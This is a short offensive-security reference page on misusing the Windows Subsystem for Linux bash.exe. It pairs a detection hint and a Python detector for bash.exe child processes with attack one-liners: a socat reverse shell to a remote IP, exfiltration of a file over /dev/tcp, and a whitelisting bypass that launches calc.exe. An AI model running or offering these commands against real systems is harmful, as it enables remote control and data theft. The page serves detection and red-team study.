~/Privilege Escalation/Windows/Binaries# cat Bash.exe.md
File used by Windows Subsystem for Linux
Paths:
C:\Windows\System32\bash.exe
C:\Windows\SysWOW64\bash.exe
Detection: Child processes spawned by bash.exe
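The detection above, as an added example that is not part of the original page: Python that scans process-creation records for children of the WSL bash.exe at the two paths listed. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, ParentCommandLine, UtcTime); the sample events are constructed, and receiving them as already-parsed dicts is an assumption.

```python
import ntpath

# WSL launcher paths as listed on this page (lower-cased for comparison).
WSL_BASH_PATHS = {
    r"c:\windows\system32\bash.exe",
    r"c:\windows\syswow64\bash.exe",
}

def normalize(path):
    """Strip quotes, collapse '..' and '/' forms, and lower-case a Windows path."""
    return ntpath.normpath(path.strip().strip('"')).lower()

def find_bash_children(events):
    """Return one finding per process-creation event whose parent is WSL bash.exe."""
    findings = []
    for ev in events:
        if normalize(ev.get("ParentImage", "")) not in WSL_BASH_PATHS:
            continue  # other parents, including non-WSL bash.exe builds, are ignored
        findings.append({
            "time": ev.get("UtcTime", ""),
            "child": normalize(ev.get("Image", "")),
            "child_cmd": ev.get("CommandLine", ""),
            "parent_cmd": ev.get("ParentCommandLine", ""),
        })
    return findings

# Constructed sample events (assumed to be already parsed into dicts).
SAMPLE_EVENTS = [
    {"UtcTime": "2024-01-01 10:00:00", "Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": "calc.exe", "ParentImage": r"C:\Windows\System32\bash.exe",
     "ParentCommandLine": "bash.exe -c calc.exe"},
    {"UtcTime": "2024-01-01 10:05:00", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\WINDOWS\SysWOW64\..\SysWOW64\BASH.EXE",
     "ParentCommandLine": "bash.exe -c notepad.exe"},
    {"UtcTime": "2024-01-01 10:10:00", "Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami", "ParentImage": r"C:\Program Files\Git\bin\bash.exe",
     "ParentCommandLine": "bash.exe --login"},
    {"UtcTime": "2024-01-01 10:15:00", "Image": r"C:\Windows\System32\bash.exe",
     "CommandLine": "bash.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for f in find_bash_children(SAMPLE_EVENTS):
        print(f"{f['time']}  {f['parent_cmd']!r} -> {f['child']} ({f['child_cmd']!r})")
```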
Execute
Executes calc.exe from bash.exe
bash.exe -c calc.exe
Executes a reverse shell
bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Exfiltrate data
bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
AWL bypass
Executes calc.exe from bash.exe
bash.exe -c calc.exe